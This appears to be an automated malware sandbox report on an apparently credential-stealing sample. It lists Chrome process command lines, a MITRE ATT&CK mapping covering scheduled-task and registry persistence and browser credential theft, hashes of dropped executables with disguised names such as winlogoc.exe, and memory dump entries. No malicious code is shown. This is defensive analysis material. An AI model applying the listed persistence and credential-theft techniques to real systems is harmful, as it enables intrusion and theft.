  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3860 --field-trial-handle=1380,i,17567223204195449919,11036989016641761234,131072 /prefetch:8
  2⤵
  PID:1048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=1060 --field-trial-handle=1380,i,17567223204195449919,11036989016641761234,131072 /prefetch:1
  2⤵
  PID:2272

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2068

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zOCD72E6C6\Crypto Scarlett.exe

Filesize
32.5MB

MD5
158d983c69840b2c14330f91263ab84b

SHA1
eb10c843e80321d856419272688bad1a95fb12df

SHA256
1cfb568418fd89e5bb6d08c72ce5084861a747fb66cb2a83b2de62610d73c720

SHA512
770739e63a8c068026f30fee26db0960a091535c676f6e4679b1ef59a88eac8d779513b9f00fef6b65784b51f3c95ed0478f8623f0cae084b14bcef4036f32f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rot.bat

Filesize
229B

MD5
5623353a38611880912397750358a0cf

SHA1
1abfda3058cae5b11da3e6551fbec2eb354a25d3

SHA256
4b97706d98357279a5f3f1c720f384a47d020a1fbb6aac5460e1d87786aba86c

SHA512
78b78820ce33341f40f71924087d255b6ec74472bb22562a2bfadf5f090662c691d5a293f5f8148477f414cf7f38c53c490b595489d79966d944dfe73097f0fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\S444.exe

Filesize
33KB

MD5
17e158e0f91dcc8168f2e416035926ed

SHA1
aac8bf1174db86568aab282b8a8de953c372ef1e

SHA256
bb0ef384a2d6f8fff82eecd15908bd39146ffa65810c2c56934c32c88abac94b

SHA512
383df3fa4eaecbfc6698961d3a8f5fe726db3e0cddf83f357bc9f2947328a284f4fe5b13f2eb866ea9c50eafbb5fc45b788b8401edffcbfc5bf068f545dd167c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29282\python311.dll

Filesize
5.5MB

MD5
9a24c8c35e4ac4b1597124c1dcbebe0f

SHA1
f59782a4923a30118b97e01a7f8db69b92d8382a

SHA256
a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7

SHA512
9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

Download Submit
C:\Users\Admin\AppData\Local\Temp\checkcoin.exe

Filesize
12.8MB

MD5
01b111613a23f507fe55ba0707f36cc3

SHA1
3ff03b46d4bf6bf2599446bd55c92874f0f97c49

SHA256
b1d6b572db896865287c1e24ae21dc1ad7b00c1b4386b8f4be47151a80d81cb1

SHA512
3f8c7aee0ce03a46d6da33d2f6241814c644c72ef051d49a2227f0fdb08209b80520f1b4fd643b13e981572c6a087cb7d36158be70d0d9844dfd13f155663a72

Download Submit
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe

Filesize
72KB

MD5
33fba80c2580eebf95e25dea03331f68

SHA1
d0ed67fbbff537eb393206fc41c18d59b9a4bb3c

SHA256
4cbe94aefe8a24ebac9fb5c11c1efc89c15b1a7b1a2bf3587baface318ee4b2b

SHA512
8213c45c68a38984a2ad11ab0651ae9933dc538ff260e31753f2f9c3aacff038048bcf2680bb7993b5f4005f48ae7e5c74e7325bdf6ef20df1ae7aa58f7ae4bc

Download Submit
\Users\Admin\AppData\Local\Temp\aler.exe

Filesize
20.1MB

MD5
a69e4abc83712a68b064f7abf155b145

SHA1
dea250844658e4e054cf5fc197a9ee056ea20e71

SHA256
7a326220e6d7522b56852c7ea4697b9008627704927638c13d1dc16cecfdca23

SHA512
ad0a65c77dd512b72c48feaa1a90d797a1915355a5146621912ddfc1866acfa60ff0c372b99f11f25bf5ba210d61d6f2ef1bf3775b467bd1dfcc2f71bedd1d5e

Download Submit
\Users\Admin\AppData\Local\Temp\wmpnetwk.exe

Filesize
180KB

MD5
c5d902bf30705e2cbfc64f10ccb7cef3

SHA1
e932e97d5852241829dad4be032717cf7dea9526

SHA256
1866c9ac6678850341d6e621672f54710a2d2e976d1039161937775395fc5bb5

SHA512
e5cf3f7bd289637180c69a45069d1e640310b7b450a273d52eac6294a75e944ddc9c9d423ca97977561943f0dc2a838acbca955b232709fbc00c2f8b10795d68

Download Submit
memory/1268-278-0x0000000005F90000-0x0000000006028000-memory.dmp

Filesize
608KB

Download
memory/1268-273-0x0000000001FA0000-0x0000000001FAE000-memory.dmp

Filesize
56KB

Download
memory/1268-274-0x00000000046C0000-0x00000000046CA000-memory.dmp

Filesize
40KB

Download
memory/1268-243-0x0000000000060000-0x000000000006E000-memory.dmp

Filesize
56KB

Download
memory/1268-279-0x0000000006700000-0x0000000006794000-memory.dmp

Filesize
592KB

Download
memory/1268-285-0x00000000069C0000-0x0000000006A54000-memory.dmp

Filesize
592KB

Download
memory/1632-267-0x0000000000DC0000-0x0000000000DD8000-memory.dmp

Filesize
96KB

Download
memory/2016-304-0x0000000000100000-0x000000000010E000-memory.dmp

Filesize
56KB

Download
memory/2756-36-0x0000000000990000-0x000000000099E000-memory.dmp

Filesize
56KB

Download
memory/2852-40-0x0000000000940000-0x0000000000972000-memory.dmp

Filesize
200KB

Download
memory/2876-39-0x0000000001310000-0x0000000001328000-memory.dmp

Filesize
96KB

Download